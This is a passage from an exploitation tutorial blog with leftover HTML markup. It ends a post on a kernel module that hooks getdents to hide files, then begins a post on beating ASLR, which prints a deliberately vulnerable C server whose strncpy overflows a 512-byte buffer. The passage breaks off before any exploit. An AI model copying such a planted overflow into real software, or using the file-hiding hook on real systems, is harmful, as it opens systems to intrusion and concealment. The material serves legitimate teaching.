int’ but argument is of type ‘void **’/span/span span class="code-line"span class="go"/root/lkms/hidefile.c: In function ‘getdents_hook_exit’:/span/span span class="code-line"span class="go"/root/lkms/hidefile.c:71:2: warning: passing argument 1 of ‘set_page_ro’ makes integer from pointer without a cast [enabled by default]/span/span span class="code-line"span class="go"/root/lkms/hidefile.c:49:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’/span/span span class="code-line"span class="go"/root/lkms/hidefile.c:72:9: warning: ‘return’ with a value, in function returning void [enabled by default]/span/span span class="code-line"span class="go" Building modules, stage 2./span/span span class="code-line"span class="go" MODPOST 3 modules/span/span span class="code-line"span class="go" LD [M] /root/lkms/hidefile.ko/span/span span class="code-line"span class="go"make[1]: Leaving directory `/usr/src/linux-headers-3.14-kali1-686-pae#39;/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spantouch thisisatestfile.txt/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls/span span class="code-line"span class="go"hello.c hello.o hidefile.mod.o Module.symvers reverse-app2.c reverse.mod.c reverse-test-app.c/span/span span class="code-line"span class="go"hello.ko hidefile.c hidefile.o reverse_app reverse-app.c reverse.mod.o thisisatestfile.txt/span/span span class="code-line"span class="go"hello.mod.c hidefile.ko Makefile reverse-app reverse.c reverse.o/span/span span class="code-line"span class="go"hello.mod.o hidefile.mod.c modules.order reverse-app2 reverse.ko reverse-test-app/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spaninsmod ./hidefile.ko/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls/span span class="code-line"span class="go"hello.c hello.o hidefile.mod.o Module.symvers reverse-app2.c reverse.mod.c reverse-test-app.c/span/span span class="code-line"span class="go"hello.ko hidefile.c hidefile.o reverse_app reverse-app.c reverse.mod.o/span/span span class="code-line"span class="go"hello.mod.c hidefile.ko Makefile reverse-app reverse.c reverse.o/span/span span class="code-line"span class="go"hello.mod.o hidefile.mod.c modules.order reverse-app2 reverse.ko reverse-test-app/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanrmmod hidefile/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls/span span class="code-line"span class="go"hello.c hello.o hidefile.mod.o Module.symvers reverse-app2.c reverse.mod.c reverse-test-app.c/span/span span class="code-line"span class="go"hello.ko hidefile.c hidefile.o reverse_app reverse-app.c reverse.mod.o thisisatestfile.txt/span/span span class="code-line"span class="go"hello.mod.c hidefile.ko Makefile reverse-app reverse.c reverse.o/span/span span class="code-line"span class="go"hello.mod.o hidefile.mod.c modules.order reverse-app2 reverse.ko reverse-test-app/span/span span class="code-line"/code/pre/div /td/tr/table pWoohoo! There is 1 problem with this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spaninsmod ./hidefile.ko/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls/span span class="code-line"span class="go"hello.c hello.o hidefile.mod.o Module.symvers reverse-app2.c reverse.mod.c reverse-test-app.c/span/span span class="code-line"span class="go"hello.ko hidefile.c hidefile.o reverse_app reverse-app.c reverse.mod.o/span/span span class="code-line"span class="go"hello.mod.c hidefile.ko Makefile reverse-app reverse.c reverse.o/span/span span class="code-line"span class="go"hello.mod.o hidefile.mod.c modules.order reverse-app2 reverse.ko reverse-test-app/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls thisisatestfile.txt/span span class="code-line"span class="go"thisisatestfile.txt/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls -l thisisatestfile.txt/span span class="code-line"span class="go"-rw-r--r-- 1 root root 0 Jul 11 18:18 thisisatestfile.txt/span/span span class="code-line"/code/pre/div /td/tr/table pSo if you put the whole filename there it still shows that the file exists but we can improve upon that later, we will need to hook different system calls./p h2Conclusion/h2 pThere is a lot involved with manipulating the kernel like this, it requires a lot of patients and determination./p pYou will need to look through a lot of source code and use tools like codegrep/code to find exactly what you need to get the job done./p pAlso codestrace/code is very useful when looking for the system calls being used by an application but its also handy to be able to clean up the output for readability./p pHappy Hacking :-)/p

eXploit
Beating ASLR0xe7
7 July 2014 at 15:58

Beating ASLR

eXploit

By: 0xe7

7 July 2014 at 15:58

pHere we are going to start with the first protection I want to look at which is a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization" target="_blank"address space layout randomization (ASLR)/a./p pIn parts a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a, a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a, a href="/x86-32-linux/2014/06/12/remote-exploitation/"3/a and a href="/x86-32-linux/reverse-engineering/2014/07/01/basic-binary-auditing/"4/a ASLR had been disabled./p pASLR basically randomizes the a href="https://en.wikipedia.org/wiki/Virtual_address_space" target="_blank"virtual address space/a of all userland applications and in more modern OSs, kernel space too./p !-- more -- pBefore ASLR, the virtual address space of an application was completely static, meaning that everything will always be at the same memory address each time the application is run./p pIn parts 1, 2 and 3 we've taken advantage of this by being able to predict the address that our a href="https://en.wikipedia.org/wiki/Shellcode" target="_blank"shellcode/a./p pThis protection is slightly newer in the Linux kernel than a href="https://en.wikipedia.org/wiki/NX_bit" target="_blank"NX/a, as it was first implemented in 2005 but it will introduce us to an idea which we will use much more extensively to beat NX./p h2The App/h2 pThe application below is almost the same as the 1 in part a href="/x86-32-linux/2014/06/12/remote-exploitation/"3/a of this series:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;sys/socket.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;netinet/in.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;strings.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"span class="cp"#define CNUM 58623/span/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"span class="cp"#define TFILE quot;tokenquot;/span/span span class="code-line"span class="cp"#define PORT 9999/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendfile/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"senderror/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[]);/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendtoken/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"listenfd/spanspan class="p",/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"servaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"socklen_t/spanspan class="w" /spanspan class="n"clilen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"pid_t/spanspan class="w" /spanspan class="n"childpid/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"pwd/spanspan class="p"[/spanspan class="mi"1000/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listenfd/spanspan class="o"=/spanspan class="n"socket/spanspan class="p"(/spanspan class="n"AF_INET/spanspan class="p",/spanspan class="n"SOCK_STREAM/spanspan class="p",/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"bzero/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_family/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"AF_INET/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_addr/spanspan class="p"./spanspan class="n"s_addr/spanspan class="o"=/spanspan class="n"htonl/spanspan class="p"(/spanspan class="n"INADDR_ANY/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_port/spanspan class="o"=/spanspan class="n"htons/spanspan class="p"(/spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"bind/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p")))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error: Unable to bind to port %d/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listen/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",/spanspan class="mi"1024/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="p"(;;)/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"clilen/spanspan class="o"=/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"connfd/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"accept/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"recvfrom/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p",/spanspan class="w" /spanspan class="mi"1000/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pwd/spanspan class="p"[/spanspan class="n"n/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"5/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"senderror/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendtoken/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendfile/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Received the following:/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;%squot;/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"close/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendfile/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"senderror/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[])/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;Wrong password: quot;/spanspan class="p",/spanspan class="w" /spanspan class="mi"16/spanspan class="w" /spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"p/spanspan class="p"),/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendtoken/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"TFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"TFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p",/spanspan class="w" /spanspan class="n"i/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"atoi/spanspan class="p"(/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="n"CNUM/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"5/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span 